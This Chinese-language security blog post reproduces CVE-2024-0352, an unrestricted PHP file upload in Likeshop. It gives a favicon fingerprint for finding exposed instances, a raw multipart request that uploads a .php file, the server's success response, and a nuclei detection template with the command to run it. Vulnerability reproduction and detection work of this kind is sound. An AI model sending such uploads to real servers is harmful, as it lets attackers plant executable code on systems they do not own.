免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
Likeshop HTTP POST 请求 File.php userFormImage 无限制上传漏洞
02
—
Likeshop < 2.5.7.20210311
03
—
漏洞描述
Likeshop up to 2.5.7.20210311 存在一处安全漏洞,被分类为严重级别。该漏洞影响 HTTP POST 请求处理组件的 file server/application/api/controller/File.php 的函数 FileServer::userFormImage。攻击者可以通过对参数 file 的篡改来实现未受限的文件上传。攻击可以远程发起,且已经公开披露并可能被利用。该漏洞的标识符为 VDB-250120。
04
—
icon_hash="874152924"
05
—
漏洞复现
向靶场发送如下数据包
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php
2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--
响应内容如下
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Authorization, Sec-Fetch-Mode, DNT, X-Mx-ReqToken, Keep-Alive, User-Agent, If-Match, If-None-Match, If-Unmodified-Since, X-Requested-With, If-Modified-Since, Cache-Control, Content-Type, Accept-Language, Origin, Accept-Encoding,Access-Token,token
Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, post
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 1728000
Content-Type: application/json; charset=utf-8
Date: Mon, 15 Jan 2024 07:53:52 GMT
Server: nginx
{"code":1,"msg":"上传文件成功","data":{"url":"http://192.168.40.130/uploads/user/20240114115352abad74281.php","base_url":"uploads/user/20240114115352abad74281.php","name":"IE4MGP.php"},"show":0,"time":"0.140024"}
回显路径在返回的url中,访问回显文件
漏洞复现成功
06
—
nuclei poc
poc文件内容如下,nuclei-templates中已发布
id: CVE-2024-0352
info:
name: Likeshop < 2.5.7.20210311 - Arbitrary File Upload
author: CookieHanHoan,babybash,samuelsamuelsamuel
severity: high
description: |
A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434
impact: |
The product allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.
remediation: Update to the latest version
reference:
https://nvd.nist.gov/vuln/detail/CVE-2024-0352
https://note.zhaoj.in/share/ciwYj7QXC4sZ
https://vuldb.com/?ctiid.250120
https://vuldb.com/?id.250120
classification:
: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
: 7.3
: CVE-2024-0352
: CWE-434
metadata:
verified: true
: 1
vendor: likeshop
: http.favicon.hash:874152924
tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive
variables:
filename: "{{rand_base(6)}}"
http:
raw:
|
POST /api/file/formimage HTTP/1.1
Host: {{Hostname}}
: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
------WebKitFormBoundarygcflwtei
: form-data; name="file";filename="{{filename}}.php"
: application/x-php
{{randstr}}
------WebKitFormBoundarygcflwtei--
matchers:
type: dsl
dsl:
'status_code == 200'
'contains(body, ""name":"{{filename}}.php"")'
'contains_all(body, "code":1", "base_url":"uploads\/user")'
condition: and
extractors:
type: json
part: body
json:
".data.url"
# digest: 4a0a00473045022100deb88d0d5f3f0af25df24379957bd65e84c9ce39a4d8c4aa791388f67b61c25002207f6c80534d7839ef8754e96b5ea1c543908e9c77315afcb83a24e6022d227026:922c64590222798bb761d5b6d8e72950
运行POC
.nuclei.exe -l data/Likeshop2.txt -t nuclei-templateshttpcves2024CVE-2024-0352.yaml
07
—
修复建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(AI与网安):[漏洞复现]CVE-2024-0352
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论